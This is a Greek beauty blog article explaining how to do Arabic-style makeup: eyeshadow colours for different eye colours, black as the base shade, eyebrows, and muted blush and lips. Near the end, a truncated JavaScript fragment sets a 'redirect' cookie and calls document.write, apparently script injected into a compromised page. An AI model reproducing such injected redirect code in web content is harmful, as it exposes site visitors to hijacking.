Πώς να κάνουμε αραβικό μακιγιάζ

Το αραβικό μακιγιάζ αποτελεί μια εξαιρετική τέχνη, που συμπεριλαμβάνει μια παλέτα διάφορων χρωμάτων. Αποτελεί και ένα μέρος από το λεγόμενο «οριεντάλ στυλ», στο όποιο η αφθονία και η ομορφιά είναι αλληλοσυνδεδεμένες.

Το αραβικό μακιγιάζ είναι έντονο και δεν είναι κατάλληλο για κάθε περίπτωση. Πάντα όμως μπορείτε να βρείτε κατάλληλη ευκαιρία να εντυπωσιάσετε με το στυλ οριεντάλ. Δεν είναι τυχαία, ότι σ’αυτό το είδος μακιγιάζ ο κύριος στόχος είναι τα μάτια, τα οποία προσφέρουν την τέλεια μη-λεκτική επικοινωνία. Και όταν τα τονίζουμε με το αραβικό μακιγιάζ, τα ίδια αυτά γίνονται ακόμα πιο θαυμάσια.

Τα χρώματα των σκιών στο μακιγιάζ

Οι κατάλληλες σκιές για το αραβικό μακιγιάζ είναι αυτές που έχουν αποχρώσεις μαργαριταριού και πιο κορεσμένο χρώμα. Αυτό το είδος μακιγιάζ είναι απλο και εντυπωσιάζει πάρα πολύ. Το βασικό χρώμα των σκιών οπωσδήποτε είναι το μαύρο, που συνδυάζεται με άλλο χρώμα, το οποίο ταιριάζει με το ντύσιμο και τα ματιά σας. Για το  καφέ και μαύρο χρώμα ματιών ταιριάζει το γαλάζιο μακιγιάζ, το βαθύ γαλάζιο, το κόκκινο της φωτιάς, το καφέ, το κόκκινο και το πράσινο. Για τα  γαλάζια και πράσινα μάτια είναι κατάλληλο το αμμώδη, το χρυσό, το μωβ, το ροζ και το γκρι χρώμα. Μπορείτε να τα συνδυάσετε με μερικές  αποχρώσεις, όμως οπωσδήποτε να υπάρχει και το μαύρο χρώμα.

Εκτός από το μακιγιάζ στα μάτια, τονίζονται και τα φρύδια, τα οποία αποτελούν σημαντικό μέρος της συνολικής εμφάνισης του αραβικού μακιγιάζ. Χρησιμοποιείστε μολύβι φρυδιών και κάντε τους να φαίνονται καλύτερα και όμορφα.

Εφόσον στο αραβικό μακιγιάζ τονίζονται τα μάτια, τα υπόλοιπα μέρη του προσώπου πρέπει να έχουν απλούς τόνους . Το τέλειο ρουζ για παράδειγμα έχει το φυσικό μαύρισμα και τα χείλη με ένα τόνο πιο έντονο από το φυσικό χρώμα των χειλιών σας – δηλαδή με ματ ή γυαλιστερή απόχρωση.

Τεχνολογία του αραβικού μακιγιάζ

Το χρώμα των σκιών πρέπει να συμπληρώνει το ντύσιμό σας και για μεγαλύτερη εντύπωση μπορείτε να συνδυάσετε 2-3 πρόσθετες αποχρώσεις προς το μαύρο. Το μακιγιάζ εφαρμόζεται με φαρδύ πινέλο σε όλο το  κάτω και πάνω βλέφαρο.

αραβικό μακιγιάζ, μακιγιάζ - Πώς να κάνουμε αραβικό μακιγιάζ

πηγή : omorfia.org

new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply